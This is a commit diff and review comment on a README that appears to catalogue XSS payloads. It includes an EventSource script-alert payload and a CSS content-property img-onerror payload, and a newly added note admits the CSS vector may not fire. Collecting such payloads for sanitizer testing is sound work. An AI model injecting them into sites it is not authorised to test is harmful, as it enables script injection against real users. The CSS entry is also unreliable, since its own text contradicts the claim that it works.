Update README.md

ShadowByte 2024-08-07 14:17:47 +10:00 committed by GitHub
parent c2c96ef08b
commit 83ea59c835
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

@ -634,6 +634,7 @@ event: message\ndata: <script>alert('XSS via EventSource')</script>\n\n
CSS Content Property Injection CSS Content Property Injection
If an application allows user input in CSS properties without sanitization, it can lead to XSS. If an application allows user input in CSS properties without sanitization, it can lead to XSS.
Note:most browsers consider the content property text not html and this works under very certain conditions unsure whether the browser still accepts this however i have inserted here as a use case.
``` ```
<style> <style>
.content::before { content: '<img src=x onerror=alert("XSS via CSS Content Property")>'; } .content::before { content: '<img src=x onerror=alert("XSS via CSS Content Property")>'; }
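Review bot: the added "Note:" line under "CSS Content Property Injection" contradicts the text around it without resolving the conflict. It says most browsers treat the `content` property as text, not HTML, while the unchanged sentence above still says this "can lead to XSS" and the `<style>` payload below is presented as a working vector. Either name the "very certain conditions" under which the payload was seen to execute, or reword the note to say plainly that the string is rendered as text and the entry is kept for reference only, so readers testing their own sanitizers do not treat a non-firing payload as evidence that CSS input is handled safely. The line also needs a copy edit: add a space after "Note:", capitalise "HTML" and "I", and split the run-on into two sentences.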